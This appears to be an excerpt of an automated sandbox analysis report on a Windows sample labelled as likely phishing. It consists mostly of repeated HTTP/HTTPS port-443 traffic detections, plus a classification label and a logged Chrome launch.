Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50303 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.win@25/653@54/23
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
